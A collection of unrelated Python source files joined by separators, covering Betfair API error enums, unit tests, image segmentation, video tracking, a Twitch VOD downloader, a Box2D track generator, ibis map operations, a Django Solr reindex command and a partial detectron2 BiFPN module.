INVALID_APP_KEY = "The application key passed is invalid or is not present"
TOO_MANY_REQUESTS = (
"There are too many pending requests e.g. a listMarketBook with Order/Match projections is "
"limited to 3 concurrent requests. The error also applies to listCurrentOrders "
"listMarketProfitAndLoss and listClearedOrders if you have 3 or more requests currently "
"in execution"
)
SERVICE_BUSY = "The service is currently too busy to service this request."
TIMEOUT_ERROR = (
"The Internal call to downstream service timed out. Please note = If a TIMEOUT_ERROR error "
"occurs on a placeOrders/replaceOrders request you should check listCurrentOrders to verify the "
"status of your bets before placing further orders. Please allow up to 2 minutes for timed out "
"order to appear."
)
REQUEST_SIZE_EXCEEDS_LIMIT = (
"The request exceeds the request size limit. Requests are limited to a total of 250 "
"betId's/marketId's (or a combination of both)."
)
ACCESS_DENIED = (
"The calling client is not permitted to perform the specific action e.g. the using a Delayed "
"App Key when placing bets or attempting to place a bet from a restricted jurisdiction."
)
class MarketStatus(Enum):
INACTIVE = "The market has been created but isn't yet available."
OPEN = "The market is open for betting."
SUSPENDED = "The market is suspended and not available for betting."
CLOSED = "The market has been settled and is no longer available for betting."
class InstructionReportStatus(Enum):
SUCCESS = ""
FAILURE = ""
TIMEOUT = ""
class InstructionReportErrorCode(Enum):
INVALID_BET_SIZE = "bet size is invalid for your currency or your regulator"
INVALID_RUNNER = "Runner does not exist includes vacant traps in greyhound racing"
BET_TAKEN_OR_LAPSED = (
"Bet cannot be cancelled or modified as it has already been taken or has lapsed Includes "
"attempts to cancel/modify market on close BSP bets and cancelling limit on close BSP bets"
)
BET_IN_PROGRESS = (
"No result was received from the matcher in a timeout configured for the system"
)
RUNNER_REMOVED = "Runner has been removed from the event"
MARKET_NOT_OPEN_FOR_BETTING = "Attempt to edit a bet on a market that has closed."
LOSS_LIMIT_EXCEEDED = (
"The action has caused the account to exceed the self imposed loss limit"
)
MARKET_NOT_OPEN_FOR_BSP_BETTING = (
"Market now closed to bsp betting. Turned in-play or has been reconciled"
)
INVALID_PRICE_EDIT = (
"Attempt to edit down the price of a bsp limit on close lay bet or edit up the price of a "
"limit on close back bet"
)
INVALID_ODDS = "Odds not on price ladder - either edit or placement"
INSUFFICIENT_FUNDS = (
"Insufficient funds available to cover the bet action. Either the exposure limit or "
"available to bet limit would be exceeded"
)
INVALID_PERSISTENCE_TYPE = (
"Invalid persistence type for this market e.g. KEEP for a non bsp market"
)
ERROR_IN_MATCHER = (
"A problem with the matcher prevented this action completing successfully"
)
INVALID_BACK_LAY_COMBINATION = (
"The order contains a back and a lay for the same runner at overlapping prices. "
"This would guarantee a self match. This also applies to BSP limit on close bets"
)
ERROR_IN_ORDER = "The action failed because the parent order failed"
INVALID_BID_TYPE = "Bid type is mandatory"
INVALID_BET_ID = "Bet for id supplied has not been found"
CANCELLED_NOT_PLACED = "Bet cancelled but replacement bet was not placed"
RELATED_ACTION_FAILED = (
"Action failed due to the failure of a action on which this action is dependent"
)
NO_ACTION_REQUIRED = (
"the action does not result in any state change. eg changing a persistence to it's "
"current value"
)
class ExecutionReportStatus(Enum):
SUCCESS = "Order processed successfully"
FAILURE = "Order failed."
PROCESSED_WITH_ERRORS = (
"The order itself has been accepted but at least one (possibly all) actions have "
"generated errors. This error only occurs for replaceOrders cancelOrders and "
"updateOrders operations. The placeOrders operation will not return "
"PROCESSED_WITH_ERRORS status as it is an atomic operation."
)
TIMEOUT = "Order timed out."
class ExecutionReportErrorCode(Enum):
ERROR_IN_MATCHER = "The matcher is not healthy"
PROCESSED_WITH_ERRORS = (
"The order itself has been accepted but at least one (possibly all) actions have "
"generated errors"
)
BET_ACTION_ERROR = (
"There is an error with an action that has caused the entire order to be rejected. Check "
"the instructionReports errorCode for the reason for the rejection of the order."
)
INVALID_ACCOUNT_STATE = (
"Order rejected due to the account's status (suspended inactive dup cards)"
)
INVALID_WALLET_STATUS = "Order rejected due to the account's wallet's status"
INSUFFICIENT_FUNDS = (
"Account has exceeded its exposure limit or available to bet limit"
)
LOSS_LIMIT_EXCEEDED = "The account has exceed the self imposed loss limit"
MARKET_SUSPENDED = "Market is suspended"
MARKET_NOT_OPEN_FOR_BETTING = (
"Market is not open for betting. It is either not yet active suspended or closed "
"awaiting settlement."
)
DUPLICATE_TRANSACTION = (
"Duplicate customer reference data submitted - Please note: There is a time window "
"associated with the de-duplication of duplicate submissions which is 60 second"
)
INVALID_ORDER = (
"Order cannot be accepted by the matcher due to the combination of actions. For example bets "
"being edited are not on the same market or order includes both edits and placement"
)
INVALID_MARKET_ID = "Market doesn't exist"
PERMISSION_DENIED = (
"Business rules do not allow order to be placed. You are either attempting to place the "
"order using a Delayed Application Key or from a restricted jurisdiction (i.e. USA)"
)
DUPLICATE_BETIDS = "duplicate bet ids found"
NO_ACTION_REQUIRED = "Order hasn't been passed to matcher as system detected there will be no state change"
SERVICE_UNAVAILABLE = "The requested service is unavailable"
REJECTED_BY_REGULATOR = (
"The regulator rejected the order. On the Italian Exchange this error will occur if "
"more than 50 bets are sent in a single placeOrders request."
)
class StreamingProtocolErrors(Enum):
"""General errors not sent with id linking to specific request (as no request context)"""
INVALID_INPUT = "Failure code returned when an invalid input is provided (could not deserialize the message)"
TIMEOUT = "Failure code when a client times out (i.e. too slow sending data)"
class StreamingAuthenticationErrors(Enum):
"""Specific to authentication"""
NO_APP_KEY = (
"Failure code returned when an application key is not found in the message"
)
INVALID_APP_KEY = (
"Failure code returned when an invalid application key is received"
)
NO_SESSION = (
"Failure code returned when a session token is not found in the message"
)
INVALID_SESSION_INFORMATION = (
"Failure code returned when an invalid session token is received"
)
NOT_AUTHORIZED = (
"Failure code returned when client is not authorized to perform the operation"
)
MAX_CONNECTION_LIMIT_EXCEEDED = (
"Failure code returned when a client tries to create more connections than "
"allowed to"
)
class StreamingSubscriptionErrors(Enum):
"""Specific to subscription requests"""
SUBSCRIPTION_LIMIT_EXCEEDED = (
"Customer tried to subscribe to more markets than allowed to"
)
INVALID_CLOCK = (
"Failure code returned when an invalid clock is provided on re-subscription (check initialClk / "
"clk supplied)"
)
class StreamingGeneralErrors(Enum):
"""General errors which may or may not be linked to specific request id"""
UNEXPECTED_ERROR = (
"Failure code returned when an internal error occurred on the server"
)
CONNECTION_FAILED = (
"Failure code used when the client / server connection is terminated"
)
class StreamingSide(Enum):
"""Some enums are provided in shorthand"""
L = "LAY"
B = "BACK"
class StreamingStatus(Enum):
E = "EXECUTABLE"
EC = "EXECUTION_COMPLETE"
class StreamingPersistenceType(Enum):
L = "LAPSE"
P = "PERSIST"
MOC = "MARKET_ON_CLOSE"
class StreamingOrderType(Enum):
L = "LIMIT"
MOC = "MARKET_ON_CLOSE"
LOC = "LIMIT_ON_CLOSE"
class StreamingRegulatorCode(Enum):
REG_GGC = "GIBRALTAR REGULATOR"
|
500702
|
import unittest
from .utils import *
class TestReverseLdCoeffs(unittest.TestCase):
def test_reverse_ld_coeffs(self):
pass
class TestReverseQCoeffs(unittest.TestCase):
def test_quadratic(self):
expected_q1 = 36.
expected_q2 = 0.16666666666666666
q1, q2 = reverse_q_coeffs("quadratic", 2., 4.)
self.assertEqual(q1, expected_q1)
self.assertEqual(q2, expected_q2)
|
500706
|
import os
import unittest
from collections import namedtuple
import pandas as pd
from pmutt import cantera
class TestCantera(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
def test_get_omkm_range(self):
# Test that CTI range handles strings that can be directly converted to
# int
objs = ['0001', '0002', '0003', '0005', '0008', '0009', '0010']
CTI_range_out = '["0001 to 0003", "0005", "0008 to 0010"]'
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
# Test that CTI range handles objects with ID as an attribute
# that can be directly converted to int
ObjWithId = namedtuple('ObjWithId', 'id')
objs_id = [ObjWithId(obj_id) for obj_id in objs]
self.assertEqual(cantera._get_omkm_range(objs=objs_id), CTI_range_out)
# Test that CTI range handles objects with name as an attribute
# that can be directly converted to int
ObjWithName = namedtuple('ObjWithName', 'name')
objs_name = [ObjWithName(obj_name) for obj_name in objs]
self.assertEqual(cantera._get_omkm_range(objs=objs_name), CTI_range_out)
# Test that CTI range handles strings that have a header and a footer
objs = [
'test_0001', 'test_0002', 'test_0003', 'test_0005', 'test_0008',
'test_0009', 'test_0010'
]
CTI_range_out = ('["test_0001 to test_0003", "test_0005", '
'"test_0008 to test_0010"]')
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
# Test that CTI range handles multiple groups with headers and footers
objs = [
'test1_0001', 'test1_0002', 'test1_0003', 'test1_0005',
'test1_0008', 'test1_0009', 'test1_0010', 'test2_0005',
'test2_0006', 'test2_0100', '0001', '0002', '0003', '0005'
]
CTI_range_out = ('["test1_0001 to test1_0003", "test1_0005", '
'"test1_0008 to test1_0010", '
'"test2_0005 to test2_0006", "test2_0100", '
'"0001 to 0003", "0005"]')
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
if __name__ == '__main__':
unittest.main()
|
500804
|
from cfast_slic import SlicModel
class BaseSlic(object):
arch_name = "__TODO__"
def __init__(self,
num_components=400,
slic_model=None,
compactness=10,
min_size_factor=0.25,
subsample_stride=3,
convert_to_lab=True,
preemptive=False,
preemptive_thres=0.05,
manhattan_spatial_dist=True,
debug_mode=False,
num_threads=-1):
self.compactness = compactness
self.subsample_stride = subsample_stride
self.min_size_factor = min_size_factor
self._slic_model = slic_model and slic_model.copy() or self.make_slic_model(num_components)
self._last_assignment = None
self.convert_to_lab = convert_to_lab
self._slic_model.preemptive = preemptive
self._slic_model.preemptive_thres = preemptive_thres
self._slic_model.manhattan_spatial_dist = manhattan_spatial_dist
self._slic_model.num_threads = num_threads
self._slic_model.debug_mode = debug_mode
@property
def convert_to_lab(self):
return self._slic_model.convert_to_lab
@convert_to_lab.setter
def convert_to_lab(self, v):
self._slic_model.convert_to_lab = v
@property
def slic_model(self):
return self._slic_model
@property
def last_assignment(self):
return self._last_assignment
def iterate(self, image, max_iter=10):
if not self._slic_model.initialized:
self._slic_model.initialize(image)
assignment = self._slic_model.iterate(image, max_iter, self.compactness, self.min_size_factor, self.subsample_stride)
self._last_assignment = assignment
return assignment
@property
def num_components(self):
return self._slic_model.num_components
def make_slic_model(self, num_components):
return SlicModel(num_components, self.arch_name)
class Slic(BaseSlic):
arch_name = 'standard'
class SlicRealDist(BaseSlic):
arch_name = 'standard'
real_dist_type = 'standard'
def make_slic_model(self, num_components):
model = SlicModel(num_components, self.arch_name)
model.real_dist = True
model.real_dist_type = self.real_dist_type
return model
class SlicRealDistL2(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'l2'
class SlicRealDistNoQ(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'noq'
def __init__(self, *args, **kwargs):
float_color = kwargs.pop("float_color", True)
super(SlicRealDistNoQ, self).__init__(*args, **kwargs)
self._slic_model.float_color = float_color
class LSC(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'lsc'
|
500912
|
from __future__ import absolute_import, division, print_function
import cv2
import os
import os.path as osp
import pprint
import time
import numpy as np
import torch
import yaml
from torch.autograd import Variable
from torch.utils.data import DataLoader
from sacred import Experiment
from tracktor.config import get_output_dir
from tracktor.resnet import resnet50
from tracktor.tracker import Tracker
from frcnn.model import test
from tracktor.utils import interpolate, plot_sequence
import data_handle
ex = Experiment()
ex.add_config('experiments/cfgs/tracktor.yaml')
ex.add_config(ex.configurations[0]._conf['tracktor']['obj_detect_config'])
ex.add_config(ex.configurations[0]._conf['tracktor']['reid_network_config'])
webcam = 'data/boli_pianduan.mp4'
@ex.automain
def main(tracktor,siamese, _config):
# set all seeds
torch.manual_seed(tracktor['seed'])
torch.cuda.manual_seed(tracktor['seed'])
np.random.seed(tracktor['seed'])
torch.backends.cudnn.deterministic = True
output_dir = osp.join(get_output_dir(tracktor['module_name']), tracktor['name'])
sacred_config = osp.join(output_dir, 'sacred_config.yaml')
if not osp.exists(output_dir):
os.makedirs(output_dir)
with open(sacred_config, 'w') as outfile:
yaml.dump(_config, outfile, default_flow_style=False)
##########################
# Initialize the modules #
##########################
# object detection
print("[*] Building object detector")
if tracktor['network'].startswith('frcnn'):
# FRCNN
from tracktor.frcnn import FRCNN
from frcnn.model import config
if _config['frcnn']['cfg_file']:
config.cfg_from_file(_config['frcnn']['cfg_file'])
if _config['frcnn']['set_cfgs']:
config.cfg_from_list(_config['frcnn']['set_cfgs'])
obj_detect = FRCNN(num_layers=101)
obj_detect.create_architecture(2, tag='default',
anchor_scales=config.cfg.ANCHOR_SCALES,
anchor_ratios=config.cfg.ANCHOR_RATIOS)
obj_detect.load_state_dict(torch.load(tracktor['obj_detect_weights']))
else:
raise NotImplementedError(f"Object detector type not known: {tracktor['network']}")
obj_detect.eval()
obj_detect.cuda()
# tracktor
tracker = Tracker(obj_detect, tracktor['tracker'])
tracker.reset() # init tracker
print("[*] Beginning evaluation...")
time_total = 0
cap = cv2.VideoCapture(webcam)
num_images = 0
images = []
try:
begin = time.time()
while (cap.isOpened()):
ret, frame = cap.read()
images.append(frame)
time.time()
try:
blob = data_handle.data_process(frame)
except:
print('over')
break
tracker.step(blob)
num_images += 1
if num_images % 10 == 0:
print('now is :',num_images)
results = tracker.get_results()
end = time.time()
print("[*] Tracks found: {}".format(len(results)))
print('It takes: {:.3f} s'.format((end-begin)))
if tracktor['write_images']:
plot_sequence(results, images, '/home/longshuz/project/tracking_wo_bnw/output/tracktor/results')
cap.release()
except:
raise KeyboardInterrupt
|
500916
|
import logging
import re
from contextlib import suppress
from datetime import timedelta, datetime, timezone
from pathlib import Path
from tempfile import NamedTemporaryFile
from time import monotonic, sleep
from typing import Callable, Optional, List, cast, ClassVar, Pattern, Tuple, IO
from urllib.parse import urljoin
import requests
from iso8601 import parse_date
from m3u8 import M3U8
from pydantic import BaseModel
from .events import StartDownloading, PlaylistUpdate, StopDownloading, DownloadedChunk
from .twitch_api import TwitchAPI
from .utils import retry_on_exception, Publisher, fails_in_row, chunked
log = logging.getLogger(__name__)
@retry_on_exception(requests.exceptions.RequestException, wait=5, max_tries=30)
def get_url(url: str) -> requests.Response:
return requests.get(url, timeout=2)
class TwitchVideo(BaseModel): # type: ignore
created_at: str
description: str
duration: str
id: str
language: str
published_at: str
thumbnail_url: str
title: str
type: str
url: str
user_id: str
view_count: int
viewable: str
class Config:
ignore_extra = False
allow_extra = True
class TwitchPlaylist:
def __init__(self, video_id: str, quality: str, variant_playlist_fetch: Callable[[], str]) -> None:
self.video_id = video_id
self.quality = quality
self._m3u8: Optional[M3U8] = None
self._url: Optional[str] = None
self._variant_m3u8: Optional[M3U8] = None
self._variant_fetch: Callable[[], str] = variant_playlist_fetch
@property
def m3u8(self) -> M3U8:
if not self._m3u8:
self.update()
return self._m3u8
@property
def files(self) -> List[str]:
return self.m3u8.files # type: ignore
@property
def base_uri(self) -> str:
return urljoin(self.url, '.')
@property
def url(self) -> str:
if not self._url:
self._url = self._get_playlist_url()
return self._url
@retry_on_exception(requests.exceptions.RequestException, max_tries=2)
def update(self, use_old_url: bool = False) -> None:
if not use_old_url:
self._url = self._get_playlist_url()
request = get_url(self.url)
self._m3u8 = M3U8(request.text)
def _get_playlist_url(self) -> str:
log.debug(f'Retrieving playlist: {self.video_id} {self.quality}')
self._variant_m3u8 = M3U8(self._variant_fetch())
try:
return cast(str,
next(playlist.uri for playlist in self._variant_m3u8.playlists if
playlist.media[0].group_id == self.quality))
except StopIteration:
qualities = [playlist.media[0].group_id for playlist in self._variant_m3u8.playlists]
msg = f"Got '{self.quality}' while expected one of {qualities}"
log.exception(msg)
raise
def segments_after(self, last_segment: Optional[str]) -> List[str]:
if last_segment is None:
return self.files
# Suppose that all segments are named like '{number}.ts' according to HLS specification
n = int(last_segment.rstrip('.ts'))
if n + 1 > len(self.files):
return []
return self.files[n + 1:]
class TwitchDownloadManager(Publisher):
_CHUNK_SIZE = 10
_TIME_LIMIT = _CHUNK_SIZE * 10
_SLEEP_TIME = 30
_DURATION_RE: ClassVar[Pattern] = re.compile(r'(?:(?P<hours>\d+)h)?(?:(?P<minutes>\d+)m)?(?:(?P<seconds>\d+)s)?')
def __init__(self, twitch_api: TwitchAPI, temporary_folder: Path) -> None:
super().__init__()
self._twitch_api = twitch_api
self.temporary_folder = Path(temporary_folder)
def download(self, video_id: str, *,
quality: str = 'chunked',
video_type: Optional[str] = None) -> Tuple[TwitchVideo, Path]:
if video_type not in TwitchAPI.VIDEO_TYPES:
video_type = TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0]).broadcast_type
if video_type != 'archive':
raise ValueError('Only archive twitch video allowed')
return self._download_archive(video_id, quality=quality)
def _download_archive(self, video_id: str, quality: str) -> Tuple[TwitchVideo, Path]:
with NamedTemporaryFile(suffix='.ts', delete=False, dir=str(self.temporary_folder.resolve())) as file:
log.info(f'Create temporary file {file.name}')
playlist = TwitchPlaylist(video_id, quality=quality,
variant_playlist_fetch=lambda: self._twitch_api.get_variant_playlist(video_id))
is_downloaded = is_recording = False
# next(exist_new_segment) - VODs info can be glitched sometime. Duration is increasing for hours but
# no new segments are added in playlist. VOD is considered complete if there is no new segments for
# 10*_SLEEP_TIME seconds ~ 5 minutes by default (is_downloaded = is_recording = True)
exist_new_segment = fails_in_row(10)
next(exist_new_segment)
last_segment: Optional[str] = None
log.info(f'Start downloading {video_id} with {quality} quality')
self.publish(StartDownloading(id=video_id))
while not is_downloaded or (is_recording and next(exist_new_segment)):
is_recording = self._video_is_recording(video_id)
playlist.update(use_old_url=is_downloaded)
segments_to_load = playlist.segments_after(last_segment)
exist_new_segment.send(bool(segments_to_load))
self.publish(PlaylistUpdate(total_size=len(playlist.files), to_load=len(segments_to_load)))
is_downloaded = False
for chunk in chunked(segments_to_load, self._CHUNK_SIZE):
start_time = monotonic()
# Last downloaded or previous last_segment if no segments downloaded
last_segment = self._download_chunks(playlist.base_uri, chunk, write_to=file) or last_segment
# Downloading time exceeded. Assuming that time exceeded if no segments downloaded.
if monotonic() - start_time > self._TIME_LIMIT:
break
else:
is_downloaded = True
if is_recording and is_downloaded:
sleep(self._SLEEP_TIME)
log.info(f'Downloading {video_id} with {quality} quality successful')
self.publish(StopDownloading())
return TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0]), Path(file.name)
def _download_chunks(self, base_uri: str, segments: List[str], write_to: IO[bytes]) -> Optional[str]:
last_segment = None
with suppress(requests.exceptions.RequestException):
for chunk in segments:
write_to.write(get_url(base_uri + chunk).content)
self.publish(DownloadedChunk())
last_segment = chunk
return last_segment
def _video_is_recording(self, video_id: str) -> bool:
video = TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0])
duration_match = self._DURATION_RE.fullmatch(video.duration)
if not duration_match or not any(duration_match.groupdict()):
raise ValueError(f'Duration string "{video.duration}" can not be parsed')
duration = timedelta(**{k: int(v) for k, v in duration_match.groupdict().items() if v})
# Suppose that VOD finalized correctly
return bool((datetime.now(timezone.utc) - (parse_date(video.created_at) + duration)) < timedelta(minutes=5))
|
500927
|
from Box2D import *
from typing import List
from settings import get_boxcar_constant
import math
import numpy as np
def rotate_floor_tile(coords: List[b2Vec2], center: b2Vec2, angle: float) -> List[b2Vec2]:
"""
Rotate a given floor tile by some number of degrees.
"""
rads = angle * math.pi / 180.0 # Degree to radians
new_coords: List[b2Vec2] = []
for coord in coords:
new_coord = b2Vec2()
new_coord.x = math.cos(rads)*(coord.x - center.x) - math.sin(rads)*(coord.y - center.y) + center.x
new_coord.y = math.sin(rads)*(coord.x - center.x) + math.cos(rads)*(coord.y - center.y) + center.y
new_coords.append(new_coord)
return new_coords
def create_floor_tile(world: b2World, position: b2Vec2, angle: float) -> b2Body:
"""
Create a floor tile at some angle
"""
width = get_boxcar_constant('floor_tile_width')
height = get_boxcar_constant('floor_tile_height')
body_def = b2BodyDef()
body_def.position = position
body = world.CreateBody(body_def)
# Create Fixture
fixture_def = b2FixtureDef()
fixture_def.shape = b2PolygonShape()
fixture_def.friction = 0.5
# Coordinates of tile
# p3---------p2
# | |
# p0---------p1
coords: List[b2Vec2] = []
coords.append(b2Vec2(0, 0)) # p0
coords.append(b2Vec2(width, 0)) # p1
coords.append(b2Vec2(width, -height)) # p2
coords.append(b2Vec2(0, -height)) # p3
# Rotate @NOTE: This rotates in reference to p0
coords = rotate_floor_tile(coords, b2Vec2(0, 0), angle)
# Set vertices of fixture
fixture_def.shape.vertices = coords
body.CreateFixture(fixture_def)
return body
class Floor(object):
def __init__(self, world: b2World, seed = get_boxcar_constant('gaussian_floor_seed'), num_tiles = get_boxcar_constant('max_floor_tiles')):
self.world = world
self.seed = seed # @TODO: Add this to the setting
self.num_tiles = num_tiles
self.floor_tiles: List[b2Body] = []
self.rand = np.random.RandomState(self.seed) # @NOTE: the floor has it's own random that it references.
self.floor_creation_type = get_boxcar_constant('floor_creation_type').lower()
if self.floor_creation_type == 'gaussian':
self._generate_gaussian_random_floor()
elif self.floor_creation_type == 'ramp':
self._generate_ramp()
elif self.floor_creation_type == 'jagged':
self._create_jagged_floor()
self.lowest_y = 10
for floor_tile in self.floor_tiles:
world_coords = [floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[i]) for i in range(4)]
for coord in world_coords:
if coord.y < self.lowest_y:
self.lowest_y = coord.y
def destroy(self):
"""
Destroy the floor.
If you're familiar with C, think of this as "free"
"""
for tile in self.floor_tiles:
self.world.DestroyBody(tile)
def _generate_gaussian_random_floor(self):
"""
Helper method for generating a gaussian random floor
"""
threshold = get_boxcar_constant('tile_gaussian_threshold')
denominator = get_boxcar_constant('tile_gaussian_denominator')
mu = get_boxcar_constant('tile_angle_mu')
std = get_boxcar_constant('tile_angle_std')
tile_position = b2Vec2(-5, 0)
#@NOTE: Look in README.md for explanation of the below equation
for i in range(self.num_tiles):
numerator = min(i, threshold)
scale = min(float(numerator) / denominator, 1.0)
angle = self.rand.normal(mu, std) * scale
floor_tile = create_floor_tile(self.world, tile_position, angle)
self.floor_tiles.append(floor_tile)
t = 1
if angle < 0:
t = 0
# @TODO: Fix this. For whatever reason B2D rearranges the vertices. I should track a point during its creation instead
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[t])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _generate_ramp(self):
"""
Helper method for generating a ramp
"""
const_angle = get_boxcar_constant('ramp_constant_angle')
approach_tiles_needed = get_boxcar_constant('ramp_approach_distance') / get_boxcar_constant('floor_tile_width')
approach_tiles_needed = math.ceil(approach_tiles_needed)
# Create the approach
tile_position = b2Vec2(-5, 0)
for i in range(approach_tiles_needed):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
last_approach_tile = tile_position
# Are we using a constant angle for the ramp?
if const_angle:
num_ramp_tiles = get_boxcar_constant('ramp_constant_distance') / get_boxcar_constant('floor_tile_width')
num_ramp_tiles = math.ceil(num_ramp_tiles)
# Create ramp
for i in range(num_ramp_tiles):
floor_tile = create_floor_tile(self.world, tile_position, const_angle)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
# If not, create the increasing ramp
else:
start_angle = get_boxcar_constant('ramp_start_angle')
increasing_angle = get_boxcar_constant('ramp_increasing_angle')
max_angle = get_boxcar_constant('ramp_max_angle')
increasing_type = get_boxcar_constant('ramp_increasing_type').lower()
current_angle = start_angle
# Create ramp
while True:
if increasing_type == 'multiply':
next_angle = current_angle * increasing_angle
elif increasing_type == 'add':
next_angle = current_angle + increasing_angle
else:
raise Exception("Unknown 'ramp_increasing_type', '{}'".format(increasing_type))
# If the next requested angle exceeds our maximum, break
if next_angle > max_angle:
break
floor_tile = create_floor_tile(self.world, tile_position, current_angle)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
current_angle = next_angle
# Create the landing zone
distance_to_fly = get_boxcar_constant('ramp_distance_needed_to_jump')
tile_position = b2Vec2(tile_position.x + distance_to_fly, last_approach_tile.y)
for i in range(10):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _create_jagged_floor(self):
"""
Helper method for creating a jagged floor.
"""
tile_position = b2Vec2(-5, 0)
increasing_angle = get_boxcar_constant('jagged_increasing_angle')
decreasing_angle = -get_boxcar_constant('jagged_decreasing_angle')
for i in range(get_boxcar_constant('max_floor_tiles')):
angle = increasing_angle if i % 2 == 1 else decreasing_angle
floor_tile = create_floor_tile(self.world, tile_position, angle)
self.floor_tiles.append(floor_tile)
# You can blame this part of B2D. For Python it rearranges the vertices that I reference...
t = 1
if angle < 0:
t =0
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[t])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _create_stopping_zone(self, tile_position: b2Vec2) -> None:
"""
Creates a stopping zone so that the cars have a flat surface at the end of whatever track they were on.
"""
max_car_size = (get_boxcar_constant('max_chassis_axis') * 2.0) + (2.0 * get_boxcar_constant('max_wheel_radius'))
tile_width = get_boxcar_constant('floor_tile_width')
tiles_needed_before_wall = math.ceil(max_car_size / tile_width)
additional_landing_zone = 0.0
additional_tiles_needed = additional_landing_zone / tile_width
total_tiles_needed = math.ceil(tiles_needed_before_wall + additional_tiles_needed + 1)
# Create a landing zone
for i in range(total_tiles_needed):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
if i == tiles_needed_before_wall:
self.winning_tile = self.floor_tiles[-1]
# @NOTE: If you really want you can add the below back in. I'm not adding it to settings, but it is funny
# to watch the cars develop strategies to try to climb the wall.
# Create wall
# num_wall_tiles = math.ceil(max_car_size * 2.0 / tile_width)
# for i in range(num_wall_tiles):
# floor_tile = create_floor_tile(self.world, tile_position, 90)
# self.floor_tiles.append(floor_tile)
# world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
# # Adjust the tile to the left a bit so they overlap and form a wall
# tile_position = b2Vec2(world_coord.x - get_boxcar_constant('floor_tile_height'), world_coord.y)
|
500934
|
from public import public
from ...common import exceptions as com
from .. import datatypes as dt
from .. import rules as rlz
from ..signature import Argument as Arg
from .core import ValueOp
@public
class MapLength(ValueOp):
arg = Arg(rlz.mapping)
output_type = rlz.shape_like('arg', dt.int64)
@public
class MapValueForKey(ValueOp):
arg = Arg(rlz.mapping)
key = Arg(rlz.one_of([rlz.string, rlz.integer]))
def output_type(self):
return rlz.shape_like(tuple(self.args), self.arg.type().value_type)
@public
class MapValueOrDefaultForKey(ValueOp):
arg = Arg(rlz.mapping)
key = Arg(rlz.one_of([rlz.string, rlz.integer]))
default = Arg(rlz.any)
def output_type(self):
arg = self.arg
default = self.default
map_type = arg.type()
value_type = map_type.value_type
default_type = default.type()
if default is not None and not dt.same_kind(default_type, value_type):
raise com.IbisTypeError(
"Default value\n{}\nof type {} cannot be cast to map's value "
"type {}".format(default, default_type, value_type)
)
result_type = dt.highest_precedence((default_type, value_type))
return rlz.shape_like(tuple(self.args), result_type)
@public
class MapKeys(ValueOp):
arg = Arg(rlz.mapping)
def output_type(self):
arg = self.arg
return rlz.shape_like(arg, dt.Array(arg.type().key_type))
@public
class MapValues(ValueOp):
arg = Arg(rlz.mapping)
def output_type(self):
arg = self.arg
return rlz.shape_like(arg, dt.Array(arg.type().value_type))
@public
class MapConcat(ValueOp):
left = Arg(rlz.mapping)
right = Arg(rlz.mapping)
output_type = rlz.typeof('left')
|
500956
|
from time import time
from django.core.management.base import BaseCommand, CommandError
from django.db.models import Q
from canvas.models import Comment, Category
from canvas import search
from django.conf import settings
class Command(BaseCommand):
args = 'solr_core'
help = 'WARNING: Deletes everything first! Bulk import all data into SOLR. solr_core is one of "comment" or "group"'
def handle(self, solr_core, *args, **options):
if solr_core == 'comment':
qs = Comment.objects.exclude(reply_content__id=None).filter(category__name='stamps')
elif solr_core == 'group':
qs = Category.objects.all()
else:
raise Exception("Unknown solr_core %r" % solr_core)
conn = search.get_local(solr_core).connection
conn.delete_query('*:*')
count = qs.count()
for e, obj in enumerate(qs.only('id')):
obj.update_solr()
if e % 100 == 0:
print "%0.02f%% complete" % (float(e)/count*100)
print "Commit/Optimize"
conn.commit()
conn.optimize()
print "Done!"
|
500957
|
import timm
import torch
import torch.nn.functional as F
from detectron2.layers import NaiveSyncBatchNorm, ShapeSpec
from detectron2.modeling import Backbone
from torch import nn
__all__ = ["BiFPN"]
class DepthwiseSeparableConv2d(nn.Sequential):
def __init__(
self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
bias=True,
):
dephtwise_conv = nn.Conv2d(
in_channels,
out_channels,
kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=in_channels,
bias=False,
)
pointwise_conv = nn.Conv2d(
out_channels,
out_channels,
kernel_size=1,
bias=bias,
)
super().__init__(dephtwise_conv, pointwise_conv)
class Conv3x3BnReLU(nn.Sequential):
def __init__(self, in_channels, stride=1):
conv = DepthwiseSeparableConv2d(
in_channels,
in_channels,
kernel_size=3,
bias=False,
padding=1,
stride=stride,
)
bn = NaiveSyncBatchNorm(in_channels, momentum=0.03)
relu = nn.ReLU(inplace=True)
super().__init__(conv, bn, relu)
class FastNormalizedFusion(nn.Module):
def __init__(self, in_nodes):
super().__init__()
self.in_nodes = in_nodes
